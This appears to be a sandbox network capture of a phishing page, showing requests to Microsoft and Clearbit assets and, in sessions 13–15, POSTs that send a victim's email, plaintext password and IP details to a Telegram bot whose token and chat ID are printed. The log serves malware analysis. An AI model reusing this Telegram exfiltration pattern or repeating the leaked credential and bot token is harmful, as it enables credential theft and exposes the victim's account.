                                                                                                                      2024-12-03 07:54:32 UTC419OUTGET /shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1
                                                                                                                      Host: aadcdn.msftauth.net
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:32 UTC716INHTTP/1.1 200 OK
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                      Age: 21142227
                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                      Content-MD5: tUCo5RgDcZLjLE/li/Lbqw==
                                                                                                                      Content-Type: image/gif
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:32 GMT
                                                                                                                      Etag: 0x8D79A1B9F8A840E
                                                                                                                      Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT
                                                                                                                      Server: ECAcc (lhc/7929)
                                                                                                                      X-Cache: HIT
                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                      x-ms-request-id: 549bd2a0-401e-0027-800f-851a1b000000
                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                      Content-Length: 3620
                                                                                                                      Connection: close
                                                                                                                      2024-12-03 07:54:32 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                      Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.44976513.227.8.724434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:33 UTC505OUTGET /itnaledi.co.za HTTP/1.1
                                                                                                                      Host: logo.clearbit.com
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      Accept: */*
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Origin: null
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:34 UTC548INHTTP/1.1 200 OK
                                                                                                                      Content-Type: image/png
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      access-control-allow-origin: *
                                                                                                                      Cache-Control: public, max-age=2592000
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:33 GMT
                                                                                                                      x-envoy-response-flags: -
                                                                                                                      Server: Clearbit
                                                                                                                      strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                      x-content-type-options: nosniff
                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                      Via: 1.1 54be26bfc4ffb919832e488b736f28fe.cloudfront.net (CloudFront)
                                                                                                                      X-Amz-Cf-Pop: BAH53-C1
                                                                                                                      X-Amz-Cf-Id: VH3Jxpl11coLLYs6b_96NtmjrvQE2ZrwDrSKXTN26I95UyAFF4fEbw==
                                                                                                                      2024-12-03 07:54:34 UTC9306INData Raw: 32 34 35 32 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 24 19 49 44 41 54 78 9c ec 7d 09 b8 5d 55 75 ff 5a 6b ef 73 ce 1d de 94 bc cc 13 09 19 80 10 08 43 c2 10 12 86 80 88 22 38 b5 2a 6a 05 14 5b a1 b4 5a 11 d1 6a ff a5 d5 56 91 5a a4 83 0a 85 0e da aa 88 20 2a 22 20 10 86 94 29 24 04 02 81 40 c8 48 20 73 de 70 a7 73 ce de 6b fd bf bd cf bd 2f 2f 83 04 9c 2e 5f df 5d df 55 ee bb f7 9c 7b f6 5e bf 35 ef b5 77 b4 88 40 8b 9a 47 d4 ec 01 0c 75 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64
                                                                                                                      Data Ascii: 2452PNGIHDRL\$IDATx}]UuZksC"8*j[ZjVZ *" )$@H spsk//._]U{^5w@Gujdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjd
                                                                                                                      2024-12-03 07:54:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.44976913.227.8.724434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:36 UTC355OUTGET /itnaledi.co.za HTTP/1.1
                                                                                                                      Host: logo.clearbit.com
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:36 UTC555INHTTP/1.1 200 OK
                                                                                                                      Content-Type: image/png
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      access-control-allow-origin: *
                                                                                                                      Cache-Control: public, max-age=2592000
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:33 GMT
                                                                                                                      x-envoy-response-flags: -
                                                                                                                      Server: Clearbit
                                                                                                                      strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                      x-content-type-options: nosniff
                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                      Via: 1.1 c0f6d569dc3603537a21705f48d93398.cloudfront.net (CloudFront)
                                                                                                                      X-Amz-Cf-Pop: BAH53-C1
                                                                                                                      X-Amz-Cf-Id: uvTb-Z_qfBf1eE-1P4FRaZgwLNoOI40EQMEdXj5B7fK7_WTA-Mps-Q==
                                                                                                                      Age: 3
                                                                                                                      2024-12-03 07:54:36 UTC9306INData Raw: 32 34 35 32 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 24 19 49 44 41 54 78 9c ec 7d 09 b8 5d 55 75 ff 5a 6b ef 73 ce 1d de 94 bc cc 13 09 19 80 10 08 43 c2 10 12 86 80 88 22 38 b5 2a 6a 05 14 5b a1 b4 5a 11 d1 6a ff a5 d5 56 91 5a a4 83 0a 85 0e da aa 88 20 2a 22 20 10 86 94 29 24 04 02 81 40 c8 48 20 73 de 70 a7 73 ce de 6b fd bf bd cf bd 2f 2f 83 04 9c 2e 5f df 5d df 55 ee bb f7 9c 7b f6 5e bf 35 ef b5 77 b4 88 40 8b 9a 47 d4 ec 01 0c 75 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64 6a 01 d0 64
                                                                                                                      Data Ascii: 2452PNGIHDRL\$IDATx}]UuZksC"8*j[ZjVZ *" )$@H spsk//._]U{^5w@Gujdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjdjd
                                                                                                                      2024-12-03 07:54:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.449770149.154.167.2204434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:40 UTC522OUTOPTIONS /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: keep-alive
                                                                                                                      Accept: */*
                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                      Access-Control-Request-Headers: cache-control,content-type
                                                                                                                      Origin: null
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:40 UTC359INHTTP/1.1 204 No Content
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:40 GMT
                                                                                                                      Connection: close
                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Allow-Headers: cache-control,content-type
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.449771149.154.167.2204434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:41 UTC630OUTPOST /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: keep-alive
                                                                                                                      Content-Length: 335
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      Accept: */*
                                                                                                                      Content-Type: application/json
                                                                                                                      cache-control: no-cache
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Origin: null
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:41 UTC335OUTData Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 35 39 37 36 32 32 33 35 38 30 22 2c 22 74 65 78 74 22 3a 22 3d 3d 3d 20 47 45 4e 45 52 41 4c 20 52 65 5a 75 6c 54 20 3d 3d 3d 5c 72 5c 6e 45 6d 61 69 6c 3a 20 48 62 61 72 64 69 65 6e 40 69 74 6e 61 6c 65 64 69 2e 63 6f 2e 7a 61 5c 72 5c 6e 50 61 73 73 77 6f 72 64 31 3a 20 41 40 46 51 37 62 76 4f 73 23 55 51 45 5c 72 5c 6e 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 5c 6e 52 65 67 69 6f 6e 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 43 69 74 79 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 43 6f 75 6e 74 72 79 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 5c 72 5c 6e 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20
                                                                                                                      Data Ascii: {"chat_id":"5976223580","text":"=== GENERAL ReZulT ===\r\nEmail: Hbardien@itnaledi.co.za\r\nPassword1: A@FQ7bvOs#UQE\r\nIP Address: 8.46.123.228\nRegion: New York\nCity: New York\nCountry: United States\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;
                                                                                                                      2024-12-03 07:54:42 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:42 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 685
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-03 07:54:42 UTC685INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 31 35 34 39 32 33 38 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 72 6d 65 64 69 77 6f 72 6b 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 72 6d 65 64 69 77 6f 72 6b 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 39 37 36 32 32 33 35 38 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 72 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 64 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 72 5f 4d 65 64 69 5f 37 37 37 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 31 32 34 38 32 2c 22 74
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":43,"from":{"id":7615492389,"is_bot":true,"first_name":"Mrmediworks","username":"Mrmediworksbot"},"chat":{"id":5976223580,"first_name":"Mr","last_name":"Medi","username":"Mr_Medi_777","type":"private"},"date":1733212482,"t


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.449772149.154.167.2204434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:44 UTC401OUTGET /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:54:44 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:44 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 80
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-03 07:54:44 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.449773172.202.163.2004434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:48 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NhOYamuYEUBDEwV&MD=h57hdrmx HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                      2024-12-03 07:54:49 UTC560INHTTP/1.1 200 OK
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      Expires: -1
                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                      MS-CorrelationId: 3dd6c8f2-627f-4c8a-ab3b-15bbe8d8d64f
                                                                                                                      MS-RequestId: 8196d7b5-bc9b-43e2-bdd7-9705cec4f0a0
                                                                                                                      MS-CV: 3UlMFYxhMEKRhgJN.0
                                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:48 GMT
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 30005
                                                                                                                      2024-12-03 07:54:49 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                      2024-12-03 07:54:49 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      17192.168.2.44977413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:54:50 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:54:50 UTC471INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:54:50 GMT
                                                                                                                      Content-Type: text/plain
                                                                                                                      Content-Length: 218853
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public
                                                                                                                      Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                                                                                                      ETag: "0x8DD10CBC2E3B852"
                                                                                                                      x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075450Z-174f7845968psccphC1EWRuz9s00000015xg000000003b4g
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:54:50 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                      2024-12-03 07:54:50 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                      Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                      2024-12-03 07:54:50 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                      Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
